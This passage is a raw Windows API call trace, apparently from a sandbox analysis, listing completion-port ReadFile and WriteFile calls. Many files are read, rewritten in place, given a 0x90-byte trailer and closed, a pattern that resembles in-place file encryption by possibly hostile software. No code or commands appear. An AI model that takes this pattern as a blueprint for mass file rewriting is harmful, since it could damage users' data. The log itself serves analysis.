lpOverlapped=0x2aaf9e4) returned 1 [0160.475] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d80124, nNumberOfBytesToWrite=0x6be, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3d80020 | out: lpBuffer=0x3d80124, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3d80020) returned 0x0 [0160.490] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.521] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a20094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3a20020) returned 1 [0160.541] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.551] CloseHandle (hObject=0x1e4) returned 1 [0160.567] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3d80020) returned 1 [0160.570] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.761] ReadFile (in: hFile=0x1e4, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 1 [0160.761] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.761] ReadFile (in: hFile=0x194, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3480020) returned 1 [0160.762] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.762] ReadFile (in: hFile=0x1e8, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x35a0020) returned 1 [0160.762] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.762] WriteFile (in: hFile=0x1e4, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x11e85, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0160.763] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.763] WriteFile (in: hFile=0x194, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0x1411c, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020) returned 1 [0160.763] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.764] WriteFile (in: hFile=0x1e8, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0xb847, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020) returned 1 [0160.764] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.764] ReadFile (in: hFile=0x1e4, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 0x0 [0160.764] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.764] ReadFile (in: hFile=0x194, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3480020) returned 0x0 [0160.764] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.764] ReadFile (in: hFile=0x1e8, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0160.764] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0160.764] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0160.764] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0160.764] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0160.765] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0160.765] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0160.765] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.765] WriteFile (in: hFile=0x1e4, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0160.765] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.765] WriteFile (in: hFile=0x194, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020) returned 1 [0160.765] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.765] WriteFile (in: hFile=0x1e8, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020) returned 1 [0160.765] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.765] CloseHandle (hObject=0x1e4) returned 1 [0160.766] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0160.767] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.767] CloseHandle (hObject=0x194) returned 1 [0160.768] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0160.771] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.771] CloseHandle (hObject=0x1e8) returned 1 [0160.774] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0160.777] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.131] ReadFile (in: hFile=0x1d0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 1 [0167.132] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.132] ReadFile (in: hFile=0x1e4, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2b70020) returned 1 [0167.132] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.132] WriteFile (in: hFile=0x1d0, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x139b9, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0167.133] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.133] WriteFile (in: hFile=0x1e4, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0xfc56, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020) returned 1 [0167.133] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.133] ReadFile (in: hFile=0x1d0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 0x0 [0167.133] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.133] ReadFile (in: hFile=0x1e4, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0167.133] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.134] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.134] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.134] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0167.134] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.134] WriteFile (in: hFile=0x1d0, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0167.134] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.134] WriteFile (in: hFile=0x1e4, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020) returned 1 [0167.134] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.134] CloseHandle (hObject=0x1d0) returned 1 [0167.135] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0167.136] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.136] CloseHandle (hObject=0x1e4) returned 1 [0167.137] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0167.140] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.240] ReadFile (in: hFile=0x1e4, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 1 [0167.241] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.241] WriteFile (in: hFile=0x1e4, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x520d, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0167.241] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.241] ReadFile (in: hFile=0x1e4, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 0x0 [0167.241] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.241] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.241] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.241] WriteFile (in: hFile=0x1e4, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0167.241] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.241] CloseHandle (hObject=0x1e4) returned 1 [0167.242] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0167.243] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.346] ReadFile (in: hFile=0x1ec, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 1 [0167.346] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.346] ReadFile (in: hFile=0x1b0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2b70020) returned 1 [0167.347] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.347] WriteFile (in: hFile=0x1ec, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x16db5, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0167.348] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.348] WriteFile (in: hFile=0x1b0, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0xadae, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020) returned 1 [0167.348] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.348] ReadFile (in: hFile=0x1ec, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 0x0 [0167.348] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.348] ReadFile (in: hFile=0x1b0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0167.348] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.348] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.348] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.348] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0167.349] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.349] WriteFile (in: hFile=0x1ec, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0167.349] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, 